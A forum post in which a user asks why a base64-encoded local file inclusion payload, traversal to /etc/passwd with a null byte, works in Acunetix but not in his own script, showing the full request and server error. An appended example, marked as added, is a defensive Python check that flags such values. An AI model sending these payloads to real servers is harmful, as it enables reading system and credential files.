Messages - bl1zz4cjk

Hacking and Security / Question LFI
« on: October 04, 2015, 05:24:53 AM »
I'm sorry, my English is not very good. Good evening everyone. I've been working a bit on an LFI exploit I had with Acunetix, and it is delivering this result to me:

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

This is encrypted in base64:

 ../../../../../../../../../../etc/passwd.png

But when I encrypt the same thing in embedded form:

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZC5wbmc=


It appears different, so there must be some escape value. If I cut the string:


Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v  = ../../../../../../../../../../


but with these characters, ZXRjL3Bhc3N3ZAAucG5n, at the time of the query it does not give me the value of the LFI:


G:\exploits>php.exe exploitrpba.php
EXPLOIT ENVIADO: Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMC5wbmc=

GET /descargas/formularios/leearch.php?decorator=identity&form=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMC5wbmc=
<b>Warning</b>:  readfile(./../../../../../../../../../../etc/passwd%00.png.pdf)
 [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No
such file or directory in <b>/web/apache-1.3.19/htdocs/descargas/formularios/lee
arch.php</b> on line <b>7</b><br />

G:\exploits>



but with acunetix

/descargas/formularios/leearch.php?decorator=identity&form=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n





Could anyone help me with some link or manual to keep learning about this behavior? Thank you very much for your time.
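
Added example, not part of the original post: a Python check, written from the server operator's side, that decodes the base64 `form` parameter of the two requests shown above and flags what a file-serving handler should refuse. `BASE_DIR`, the function name, the finding labels and the third (benign) request are assumptions made for the illustration.

```python
import base64
import posixpath
from urllib.parse import parse_qs, urlsplit

BASE_DIR = "/srv/forms"  # assumed document directory, not from the post
PREFIX = "/descargas/formularios/leearch.php?decorator=identity&form="
REQUESTS = [
    # form values copied from the two requests in the post
    PREFIX + "Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n",
    PREFIX + "Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMC5wbmc=",
    # constructed benign request: base64 of "manual.png"
    PREFIX + "bWFudWFsLnBuZw==",
]


def inspect_form_param(target, param="form"):
    """Return (decoded bytes, findings) for the base64 file parameter."""
    values = parse_qs(urlsplit(target).query).get(param, [])
    if not values:
        return b"", []
    try:
        raw = base64.b64decode(values[0], validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return b"", ["invalid-base64"]
    findings = []
    if b"\x00" in raw:
        findings.append("raw-nul-byte")        # a real 0x00 byte in the name
    if b"%00" in raw:
        findings.append("literal-percent-00")  # the three characters %, 0, 0
    if b"../" in raw or b"..\\" in raw:
        findings.append("dot-dot-segment")
    # File APIs that take C strings stop at the first NUL, so judge the
    # path as the OS would see it, then check it stays under BASE_DIR.
    seen = raw.split(b"\x00", 1)[0].decode("latin-1")
    resolved = posixpath.normpath(posixpath.join(BASE_DIR, seen))
    if not resolved.startswith(BASE_DIR + "/"):
        findings.append("escapes-base-dir")
    return raw, findings


if __name__ == "__main__":
    for req in REQUESTS:
        raw, findings = inspect_form_param(req)
        print(repr(raw[-18:]), findings or "clean")
```

A handler should reject any request with a non-empty findings list before the value reaches `readfile()`, rather than trying to strip the offending bytes.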
